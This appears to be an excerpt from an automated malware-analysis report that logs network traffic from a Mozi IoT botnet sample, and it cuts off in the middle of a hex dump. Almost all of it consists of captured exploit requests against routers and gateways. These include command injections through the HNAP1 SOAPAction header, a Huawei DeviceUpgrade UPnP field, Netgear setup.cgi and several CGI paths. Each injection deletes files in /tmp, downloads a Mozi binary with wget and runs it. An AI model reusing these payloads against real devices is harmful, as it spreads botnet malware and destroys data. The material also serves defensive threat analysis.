                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 17.224.44.220:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 72.93.110.172:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 187.32.93.189:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 167.126.69.248:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 89.108.193.238:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 11.219.254.179:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 208.106.213.20:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 211.47.207.159:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 